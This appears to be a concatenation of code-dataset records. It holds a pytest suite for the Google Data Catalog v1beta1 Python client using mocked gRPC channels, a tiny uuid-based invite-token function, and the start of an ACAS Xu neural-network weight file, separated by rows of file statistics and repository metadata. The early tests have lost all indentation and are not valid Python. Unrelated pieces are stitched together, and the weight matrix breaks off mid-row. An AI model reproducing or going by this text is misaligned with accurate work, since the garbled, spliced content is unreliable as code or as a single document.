"display_name": display_name,
"description": description,
}
expected_response = datacatalog_pb2.EntryGroup(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
name = client.entry_group_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]")
response = client.get_entry_group(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.GetEntryGroupRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_entry_group_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
name = client.entry_group_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]")
with pytest.raises(CustomException):
client.get_entry_group(name)
def test_delete_entry_group(self):
channel = ChannelStub()
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
name = client.entry_group_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]")
client.delete_entry_group(name)
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.DeleteEntryGroupRequest(name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_entry_group_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
name = client.entry_group_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]")
with pytest.raises(CustomException):
client.delete_entry_group(name)
def test_create_entry(self):
# Setup Expected Response
name = "name3373707"
linked_resource = "linkedResource1544625012"
display_name = "displayName1615086568"
description = "description-1724546052"
expected_response = {
"name": name,
"linked_resource": linked_resource,
"display_name": display_name,
"description": description,
}
expected_response = datacatalog_pb2.Entry(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
parent = client.entry_group_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]")
entry_id = "entryId-2093663224"
entry = {}
response = client.create_entry(parent, entry_id, entry)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.CreateEntryRequest(
parent=parent, entry_id=entry_id, entry=entry
)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_create_entry_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
parent = client.entry_group_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]")
entry_id = "entryId-2093663224"
entry = {}
with pytest.raises(CustomException):
client.create_entry(parent, entry_id, entry)
def test_update_entry(self):
# Setup Expected Response
name = "name3373707"
linked_resource = "linkedResource1544625012"
display_name = "displayName1615086568"
description = "description-1724546052"
expected_response = {
"name": name,
"linked_resource": linked_resource,
"display_name": display_name,
"description": description,
}
expected_response = datacatalog_pb2.Entry(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup Request
entry = {}
response = client.update_entry(entry)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datacatalog_pb2.UpdateEntryRequest(entry=entry)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_update_entry_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
patch = mock.patch("google.api_core.grpc_helpers.create_channel")
with patch as create_channel:
create_channel.return_value = channel
client = datacatalog_v1beta1.DataCatalogClient()
# Setup request
entry = {}
with pytest.raises(CustomException):
client.update_entry(entry)
def test_delete_entry(self):
    """delete_entry issues a DeleteEntryRequest for the given resource name."""
    stub = ChannelStub()
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    name = client.entry_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]")
    client.delete_entry(name)

    assert len(stub.requests) == 1
    assert stub.requests[0][1] == datacatalog_pb2.DeleteEntryRequest(name=name)
def test_delete_entry_exception(self):
    """delete_entry propagates a channel error to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    name = client.entry_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]")
    with pytest.raises(CustomException):
        client.delete_entry(name)
def test_get_entry(self):
    """get_entry returns the server's Entry and sends a GetEntryRequest."""
    expected_response = datacatalog_pb2.Entry(
        name="name2-1052831874",
        linked_resource="linkedResource1544625012",
        display_name="displayName1615086568",
        description="description-1724546052",
    )
    stub = ChannelStub(responses=[expected_response])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    name = client.entry_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]")
    assert client.get_entry(name) == expected_response

    assert len(stub.requests) == 1
    assert stub.requests[0][1] == datacatalog_pb2.GetEntryRequest(name=name)
def test_get_entry_exception(self):
    """get_entry propagates a channel error to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    name = client.entry_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]")
    with pytest.raises(CustomException):
        client.get_entry(name)
def test_lookup_entry(self):
    """lookup_entry returns the server's Entry and sends an empty LookupEntryRequest."""
    expected_response = datacatalog_pb2.Entry(
        name="name3373707",
        linked_resource="linkedResource1544625012",
        display_name="displayName1615086568",
        description="description-1724546052",
    )
    stub = ChannelStub(responses=[expected_response])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    assert client.lookup_entry() == expected_response

    assert len(stub.requests) == 1
    assert stub.requests[0][1] == datacatalog_pb2.LookupEntryRequest()
def test_lookup_entry_exception(self):
    """lookup_entry propagates a channel error to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    with pytest.raises(CustomException):
        client.lookup_entry()
def test_create_tag_template(self):
    """create_tag_template returns the new TagTemplate and sends the right request."""
    expected_response = tags_pb2.TagTemplate(
        name="name3373707", display_name="displayName1615086568"
    )
    stub = ChannelStub(responses=[expected_response])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    parent = client.location_path("[PROJECT]", "[LOCATION]")
    tag_template_id = "tagTemplateId-2020335141"
    tag_template = {}
    response = client.create_tag_template(parent, tag_template_id, tag_template)
    assert response == expected_response

    assert len(stub.requests) == 1
    assert stub.requests[0][1] == datacatalog_pb2.CreateTagTemplateRequest(
        parent=parent, tag_template_id=tag_template_id, tag_template=tag_template
    )
def test_create_tag_template_exception(self):
    """create_tag_template propagates a channel error to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    parent = client.location_path("[PROJECT]", "[LOCATION]")
    with pytest.raises(CustomException):
        client.create_tag_template(parent, "tagTemplateId-2020335141", {})
def test_get_tag_template(self):
    """get_tag_template returns the TagTemplate and sends a GetTagTemplateRequest."""
    expected_response = tags_pb2.TagTemplate(
        name="name2-1052831874", display_name="displayName1615086568"
    )
    stub = ChannelStub(responses=[expected_response])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    name = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
    assert client.get_tag_template(name) == expected_response

    assert len(stub.requests) == 1
    assert stub.requests[0][1] == datacatalog_pb2.GetTagTemplateRequest(name=name)
def test_get_tag_template_exception(self):
    """get_tag_template propagates a channel error to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    name = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
    with pytest.raises(CustomException):
        client.get_tag_template(name)
def test_update_tag_template(self):
    """update_tag_template returns the TagTemplate and sends the right request."""
    expected_response = tags_pb2.TagTemplate(
        name="name3373707", display_name="displayName1615086568"
    )
    stub = ChannelStub(responses=[expected_response])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    tag_template = {}
    assert client.update_tag_template(tag_template) == expected_response

    assert len(stub.requests) == 1
    assert stub.requests[0][1] == datacatalog_pb2.UpdateTagTemplateRequest(
        tag_template=tag_template
    )
def test_update_tag_template_exception(self):
    """update_tag_template propagates a channel error to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    with pytest.raises(CustomException):
        client.update_tag_template({})
def test_delete_tag_template(self):
    """delete_tag_template sends a DeleteTagTemplateRequest with name and force."""
    stub = ChannelStub()
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    name = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
    force = False
    client.delete_tag_template(name, force)

    assert len(stub.requests) == 1
    assert stub.requests[0][1] == datacatalog_pb2.DeleteTagTemplateRequest(
        name=name, force=force
    )
def test_delete_tag_template_exception(self):
    """delete_tag_template propagates a channel error to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    name = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
    with pytest.raises(CustomException):
        client.delete_tag_template(name, False)
def test_create_tag_template_field(self):
    """create_tag_template_field returns the new field and sends the right request."""
    expected_response = tags_pb2.TagTemplateField(
        name="name3373707",
        display_name="displayName1615086568",
        is_required=True,
    )
    stub = ChannelStub(responses=[expected_response])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    parent = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
    tag_template_field_id = "tagTemplateFieldId-92144832"
    tag_template_field = {}
    response = client.create_tag_template_field(
        parent, tag_template_field_id, tag_template_field
    )
    assert response == expected_response

    assert len(stub.requests) == 1
    assert stub.requests[0][1] == datacatalog_pb2.CreateTagTemplateFieldRequest(
        parent=parent,
        tag_template_field_id=tag_template_field_id,
        tag_template_field=tag_template_field,
    )
def test_create_tag_template_field_exception(self):
    """create_tag_template_field propagates a channel error to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    parent = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
    with pytest.raises(CustomException):
        client.create_tag_template_field(parent, "tagTemplateFieldId-92144832", {})
def test_update_tag_template_field(self):
    """update_tag_template_field returns the field and sends the right request."""
    expected_response = tags_pb2.TagTemplateField(
        name="name2-1052831874",
        display_name="displayName1615086568",
        is_required=True,
    )
    stub = ChannelStub(responses=[expected_response])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    name = client.field_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]", "[FIELD]")
    tag_template_field = {}
    assert client.update_tag_template_field(name, tag_template_field) == expected_response

    assert len(stub.requests) == 1
    assert stub.requests[0][1] == datacatalog_pb2.UpdateTagTemplateFieldRequest(
        name=name, tag_template_field=tag_template_field
    )
def test_update_tag_template_field_exception(self):
    """update_tag_template_field propagates a channel error to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    name = client.field_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]", "[FIELD]")
    with pytest.raises(CustomException):
        client.update_tag_template_field(name, {})
def test_rename_tag_template_field(self):
    """rename_tag_template_field returns the field and sends the right request."""
    expected_response = tags_pb2.TagTemplateField(
        name="name2-1052831874",
        display_name="displayName1615086568",
        is_required=True,
    )
    stub = ChannelStub(responses=[expected_response])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    name = client.field_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]", "[FIELD]")
    new_tag_template_field_id = "newTagTemplateFieldId-1668354591"
    response = client.rename_tag_template_field(name, new_tag_template_field_id)
    assert response == expected_response

    assert len(stub.requests) == 1
    assert stub.requests[0][1] == datacatalog_pb2.RenameTagTemplateFieldRequest(
        name=name, new_tag_template_field_id=new_tag_template_field_id
    )
def test_rename_tag_template_field_exception(self):
    """rename_tag_template_field propagates a channel error to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    name = client.field_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]", "[FIELD]")
    with pytest.raises(CustomException):
        client.rename_tag_template_field(name, "newTagTemplateFieldId-1668354591")
def test_delete_tag_template_field(self):
    """delete_tag_template_field sends the right request with name and force."""
    stub = ChannelStub()
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    name = client.field_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]", "[FIELD]")
    force = False
    client.delete_tag_template_field(name, force)

    assert len(stub.requests) == 1
    assert stub.requests[0][1] == datacatalog_pb2.DeleteTagTemplateFieldRequest(
        name=name, force=force
    )
def test_delete_tag_template_field_exception(self):
    """delete_tag_template_field propagates a channel error to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    name = client.field_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]", "[FIELD]")
    with pytest.raises(CustomException):
        client.delete_tag_template_field(name, False)
def test_create_tag(self):
    """create_tag returns the new Tag and sends a CreateTagRequest."""
    expected_response = tags_pb2.Tag(
        name="name3373707",
        template="template-1321546630",
        template_display_name="templateDisplayName-532252787",
        column="column-1354837162",
    )
    stub = ChannelStub(responses=[expected_response])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    parent = client.entry_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]")
    tag = {}
    assert client.create_tag(parent, tag) == expected_response

    assert len(stub.requests) == 1
    assert stub.requests[0][1] == datacatalog_pb2.CreateTagRequest(
        parent=parent, tag=tag
    )
def test_create_tag_exception(self):
    """create_tag propagates a channel error to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    parent = client.entry_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]")
    with pytest.raises(CustomException):
        client.create_tag(parent, {})
def test_update_tag(self):
    """update_tag returns the Tag and sends an UpdateTagRequest."""
    expected_response = tags_pb2.Tag(
        name="name3373707",
        template="template-1321546630",
        template_display_name="templateDisplayName-532252787",
        column="column-1354837162",
    )
    stub = ChannelStub(responses=[expected_response])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    tag = {}
    assert client.update_tag(tag) == expected_response

    assert len(stub.requests) == 1
    assert stub.requests[0][1] == datacatalog_pb2.UpdateTagRequest(tag=tag)
def test_update_tag_exception(self):
    """update_tag propagates a channel error to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    with pytest.raises(CustomException):
        client.update_tag({})
def test_delete_tag(self):
    """delete_tag sends a DeleteTagRequest for the given tag name."""
    stub = ChannelStub()
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    name = client.tag_path(
        "[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]", "[TAG]"
    )
    client.delete_tag(name)

    assert len(stub.requests) == 1
    assert stub.requests[0][1] == datacatalog_pb2.DeleteTagRequest(name=name)
def test_delete_tag_exception(self):
    """delete_tag propagates a channel error to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    name = client.tag_path(
        "[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]", "[TAG]"
    )
    with pytest.raises(CustomException):
        client.delete_tag(name)
def test_list_tags(self):
    """list_tags yields each Tag from the page and sends a ListTagsRequest."""
    expected_response = datacatalog_pb2.ListTagsResponse(
        next_page_token="", tags=[{}]
    )
    stub = ChannelStub(responses=[expected_response])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    parent = client.entry_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]")
    resources = list(client.list_tags(parent))

    assert len(resources) == 1
    assert resources[0] == expected_response.tags[0]
    assert len(stub.requests) == 1
    assert stub.requests[0][1] == datacatalog_pb2.ListTagsRequest(parent=parent)
def test_list_tags_exception(self):
    """Consuming the list_tags iterator surfaces channel errors."""
    stub = ChannelStub(responses=[CustomException()])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    parent = client.entry_path("[PROJECT]", "[LOCATION]", "[ENTRY_GROUP]", "[ENTRY]")
    # The error is raised lazily, on iteration rather than on the call itself.
    paged = client.list_tags(parent)
    with pytest.raises(CustomException):
        list(paged)
def test_set_iam_policy(self):
    """set_iam_policy returns the Policy and sends a SetIamPolicyRequest."""
    expected_response = policy_pb2.Policy(version=351608024, etag=b"21")
    stub = ChannelStub(responses=[expected_response])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    resource = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
    policy = {}
    assert client.set_iam_policy(resource, policy) == expected_response

    assert len(stub.requests) == 1
    assert stub.requests[0][1] == iam_policy_pb2.SetIamPolicyRequest(
        resource=resource, policy=policy
    )
def test_set_iam_policy_exception(self):
    """set_iam_policy propagates a channel error to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    resource = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
    with pytest.raises(CustomException):
        client.set_iam_policy(resource, {})
def test_get_iam_policy(self):
    """get_iam_policy returns the Policy and sends a GetIamPolicyRequest."""
    expected_response = policy_pb2.Policy(version=351608024, etag=b"21")
    stub = ChannelStub(responses=[expected_response])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    resource = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
    assert client.get_iam_policy(resource) == expected_response

    assert len(stub.requests) == 1
    assert stub.requests[0][1] == iam_policy_pb2.GetIamPolicyRequest(resource=resource)
def test_get_iam_policy_exception(self):
    """get_iam_policy propagates a channel error to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    resource = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
    with pytest.raises(CustomException):
        client.get_iam_policy(resource)
def test_test_iam_permissions(self):
    """test_iam_permissions returns the response and sends the right request."""
    expected_response = iam_policy_pb2.TestIamPermissionsResponse()
    stub = ChannelStub(responses=[expected_response])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    resource = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
    permissions = []
    assert client.test_iam_permissions(resource, permissions) == expected_response

    assert len(stub.requests) == 1
    assert stub.requests[0][1] == iam_policy_pb2.TestIamPermissionsRequest(
        resource=resource, permissions=permissions
    )
def test_test_iam_permissions_exception(self):
    """test_iam_permissions propagates a channel error to the caller."""
    stub = ChannelStub(responses=[CustomException()])
    with mock.patch("google.api_core.grpc_helpers.create_channel") as factory:
        factory.return_value = stub
        client = datacatalog_v1beta1.DataCatalogClient()

    resource = client.tag_template_path("[PROJECT]", "[LOCATION]", "[TAG_TEMPLATE]")
    with pytest.raises(CustomException):
        client.test_iam_permissions(resource, [])
| 38.20434
| 88
| 0.661097
| 4,309
| 42,254
| 6.213275
| 0.05268
| 0.069921
| 0.0251
| 0.035857
| 0.904979
| 0.884398
| 0.866395
| 0.850558
| 0.837784
| 0.827214
| 0
| 0.024618
| 0.250154
| 42,254
| 1,105
| 89
| 38.238914
| 0.820383
| 0.063308
| 0
| 0.749035
| 0
| 0
| 0.124864
| 0.072307
| 0
| 0
| 0
| 0
| 0.088803
| 1
| 0.066924
| false
| 0.001287
| 0.011583
| 0.001287
| 0.086229
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3d4183d7b1c598f4e319b91804f7be9aaad2bb6f
| 82
|
py
|
Python
|
bartender/users/generators.py
|
autiwg/bartender
|
1c26aefb777a01ce527745c543e60b11a972fe5d
|
[
"Unlicense",
"MIT"
] | null | null | null |
bartender/users/generators.py
|
autiwg/bartender
|
1c26aefb777a01ce527745c543e60b11a972fe5d
|
[
"Unlicense",
"MIT"
] | null | null | null |
bartender/users/generators.py
|
autiwg/bartender
|
1c26aefb777a01ce527745c543e60b11a972fe5d
|
[
"Unlicense",
"MIT"
] | null | null | null |
from uuid import uuid4
def generate_invite_token():
    """Generate a short random invite token.

    Returns:
        str: the first 8 characters of a random UUID4 (lowercase hex).
    """
    full_uuid = str(uuid4())
    return full_uuid[:8]
| 13.666667
| 28
| 0.707317
| 12
| 82
| 4.666667
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.044118
| 0.170732
| 82
| 5
| 29
| 16.4
| 0.779412
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
1818ad0cd13da3bed84ee16fab3591b140c22d80
| 383,655
|
pyt
|
Python
|
eran/NNet/nnet/ACASXU_run2a_1_1_batch_2000_16bit.pyt
|
pauls658/ReluDiff-ICSE2020-Artifact
|
212854fe04f482183c239e5dfec70106a9a83df8
|
[
"Apache-2.0"
] | 7
|
2020-01-27T21:25:49.000Z
|
2022-01-07T04:37:37.000Z
|
eran/NNet/nnet/ACASXU_run2a_1_1_batch_2000_16bit.pyt
|
yqtianust/ReluDiff-ICSE2020-Artifact
|
149f6efe4799602db749faa576980c36921a07c7
|
[
"Apache-2.0"
] | 1
|
2022-01-25T17:41:54.000Z
|
2022-01-26T02:27:51.000Z
|
eran/NNet/nnet/ACASXU_run2a_1_1_batch_2000_16bit.pyt
|
yqtianust/ReluDiff-ICSE2020-Artifact
|
149f6efe4799602db749faa576980c36921a07c7
|
[
"Apache-2.0"
] | 3
|
2020-03-14T17:12:17.000Z
|
2022-03-16T09:50:46.000Z
|
ReLU
[[0.0540062, -2.61092, -0.180027, 0.242194, 0.141407], [-1.12374, 0.0263619, -0.00917929, 0.055623, -0.327635], [0.196019, 0.242159, 0.638452, -0.478265, 0.142577], [-1.63015, -0.0344447, -0.00605492, 0.0112076, -0.0104997], [-0.355133, 0.565969, 0.228267, 0.177342, -0.208078], [-0.0341918, 1.4957, -1.53371, 0.0405053, 0.16435], [0.402002, 0.224022, -0.046716, 0.16389, -0.160826], [-1.41575, -0.0747429, 0.0604386, 0.0482656, -0.0560096], [-1.44498, 0.0448403, 0.00888916, -0.25023, 0.0653312], [-1.1274, 0.0239891, -0.00956711, 0.00892796, -0.00458007], [0.613717, -0.55782, -0.0519507, 0.160852, -0.0971775], [0.933699, 0.203647, 0.166178, -0.00152163, -0.209448], [-0.0408026, 0.548666, 0.0574868, 0.142985, 0.0948681], [-0.212265, -0.328003, 0.357536, -0.389715, -0.459337], [0.032018, 0.422455, -0.568833, -0.210782, 0.0757506], [-0.0124055, 2.28453, 0.0534617, 0.0580561, 0.118652], [-0.12243, -0.712042, 0.00915904, -0.391123, 0.0339849], [0.0601742, -0.0639072, -2.50281, 0.0499702, -0.0377898], [0.0833034, -0.0407486, -0.752101, -0.118798, -0.218044], [-1.18804, 0.14463, -0.14928, -0.0360766, -0.118933], [-0.103537, 0.0699915, 2.42373, 0.0226499, 0.0319605], [-0.0853903, 0.175215, -0.0874009, -0.731836, -0.22085], [-0.0193838, 3.9939, 0.117807, 0.0784146, -0.0145183], [0.0166866, -0.654405, 0.560096, 0.196579, -0.449805], [0.00167639, 0.00538434, -0.00726639, 0.00418084, 0.00178105], [-0.897525, -0.127606, 0.162803, -0.0481184, 0.0785461], [-0.93322, -0.0243277, 0.230273, -0.209033, -0.0943662], [0.160333, 0.00369291, 0.262149, 0.281943, -0.551476], [0.0834021, 2.01281, 0.35531, 0.0360065, -0.0996482], [0.284019, -0.0465741, 0.0074793, -0.840513, -0.481789], [1.37295, 0.0058815, 0.0130908, -0.0741005, -0.155849], [-0.144445, 0.000607591, -0.0211642, -0.647714, -0.0182691], [-1.3629, -0.0207197, 0.0445642, 0.0394107, 0.0935691], [-1.55178, 0.0838021, -0.0352086, 0.00605953, 0.00828404], [1.29659, 0.0938274, 0.175474, 0.13344, 0.298777], [0.015868, 0.329773, -0.265353, 
-0.103541, 0.0765932], [-0.0415857, -1.47674, -0.0579324, -0.206667, 0.201547], [-0.0826992, 0.0025512, 0.00987215, 0.0689708, -0.878938], [-1.59025, 0.047571, 0.00763074, -0.0142601, 0.00285048], [0.0283388, -0.0230824, -0.0763311, -0.77161, 0.499034], [0.139212, -0.572182, 0.426805, -0.330029, 0.280864], [0.257852, -0.0626802, -0.331132, 0.329905, -0.856315], [0.068648, 0.00245863, -0.014261, 0.0279897, -1.85103], [-0.74459, 0.00311863, -0.187879, 0.0136177, -0.015955], [-0.416569, 0.0120669, -0.0481611, -0.364603, 0.288194], [-0.632539, -0.0358635, 0.0283509, 0.0737678, 0.0649997], [0.0392007, 0.564469, 0.262818, -0.0139606, -0.357883], [-0.0385883, -0.123878, -0.762627, 0.0423037, 0.0498901], [-1.57631, 0.000440016, -0.00832176, -0.0926607, -0.00493705], [0.620367, 0.0750374, -0.0146141, 0.262575, -0.257948], [0.05402, -2.611, -0.18, 0.2422, 0.1414], [-1.124, 0.02637, -0.00918, 0.05563, -0.3276], [0.196, 0.2422, 0.6387, -0.4783, 0.1426], [-1.63, -0.03445, -0.006054, 0.01121, -0.0105], [-0.3552, 0.566, 0.2283, 0.1774, -0.2081], [-0.03418, 1.496, -1.534, 0.0405, 0.1643], [0.402, 0.224, -0.04672, 0.164, -0.1608], [-1.416, -0.07477, 0.06042, 0.04828, -0.056], [-1.445, 0.04483, 0.00889, -0.2502, 0.0653], [-1.127, 0.02399, -0.00957, 0.00893, -0.00458], [0.614, -0.5576, -0.05194, 0.1609, 